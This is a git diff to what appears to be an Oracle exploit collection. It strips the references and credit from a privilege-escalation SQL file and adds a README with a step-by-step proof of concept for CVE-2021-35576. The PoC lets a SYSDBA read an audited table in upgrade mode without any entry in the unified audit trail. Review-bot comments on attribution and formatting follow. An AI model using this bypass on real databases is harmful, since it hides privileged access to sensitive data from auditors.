diff --git a/27-Oracle/1-Oracle 数据库Spatial 组件提权/exp.sql b/27-Oracle/1-Oracle 数据库Spatial 组件提权/exp.sql index ed3288f..9bffb84 100644 --- a/27-Oracle/1-Oracle 数据库Spatial 组件提权/exp.sql +++ b/27-Oracle/1-Oracle 数据库Spatial 组件提权/exp.sql @@ -156,13 +156,4 @@ configure auditing to catch any privilege escalation attempts. review database account permissions on regular basis. ensure database accounts have strong passwords, and rotate passwords regularly if possible. perform VA (vulnerability assesment) scans on regular basis. -pro-actively patch your systems and database systems. - - -***************************************** -References: -https://www.oracle.com/security-alerts/cpuoct2021.html -https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/ - -Credit: -Security-In-Depth Contributors: Emad Al-Mousa +pro-actively patch your systems and database systems. \ No newline at end of file diff --git a/27-Oracle/2-Oracle Unified 审计策略绕过/README.md b/27-Oracle/2-Oracle Unified 审计策略绕过/README.md new file mode 100644 index 0000000..2cf19ee --- /dev/null +++ b/27-Oracle/2-Oracle Unified 审计策略绕过/README.md 
@@ -0,0 +1,48 @@ + +### CVE +CVE-2021-35576 + +### 受影响版本 +12.1.0.2, 12.2.0.1, 19c + +### POC + +```shell +Proof of Concept (PoC): +I will create a table in pluggable database PDB1 under HR schema and insert few records: +SQL> CREATE TABLE HR.EMPLOYEE +( + FIRST_NAME VARCHAR2(50), + LAST_NAME VARCHAR2(50) +); +SQL> INSERT INTO HR.EMPLOYEE ( + FIRST_NAME, LAST_NAME) +VALUES ( 'EMAD','MOUSA' ); +SQL> commit; + + +SQL> INSERT INTO HR.EMPLOYEE ( + FIRST_NAME, LAST_NAME) +VALUES ( 'SAMI','MOUSA' ); +SQL> commit; +I will now create audit policy: +SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE; +SQL> audit policy SELECT_P1; +To check audit policies configured in PDB1 database: +SQL> SELECT * FROM audit_unified_enabled_policies; + +Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode: +sqlplus / as sysdba +SQL> alter session set container=PDB1; +SQL> shutdown immediate; +SQL> startup upgrade; +SQL> select * from HR.EMPLOYEE; +SQL> startup force; +SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL; + + +Checking the audit logs using the query, NO entry is found recorded in the unified audit trail: + +SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc; +So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view ! +``` \ No newline at end of file
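Review bot: in the exp.sql hunk (@@ -156,13 +156,4 @@), the deleted lines take out the whole References and Credit block, so the file loses the Oracle advisory link (cpuoct2021.html), the link to the original write-up, and the attribution to Emad Al-Mousa, while the hardening advice above them stays. Keep those lines, or move them into a README beside exp.sql, so the source of the material remains traceable. The rewritten last line is also flagged "\ No newline at end of file"; restore the trailing newline.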
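Review bot: in the new README.md, the final query filters on OBJECT_NAME=’EMPLOYEE’ with typographic quotes, which is not a valid SQL string literal; use straight quotes ('EMPLOYEE') so the unified_audit_trail check can be run as written. The fence is tagged shell but holds SQL*Plus statements interleaved with narrative sentences ("I will now create audit policy:", "So, even though audit policy was configured ..."); move the prose out of the fence and tag the statements as sql. The file has no reference or credit for the PoC text and no mitigation or detection section of the kind exp.sql carries, so a reader gets the bypass steps without the vendor advisory or a way to check exposure; add both. It also ends without a trailing newline.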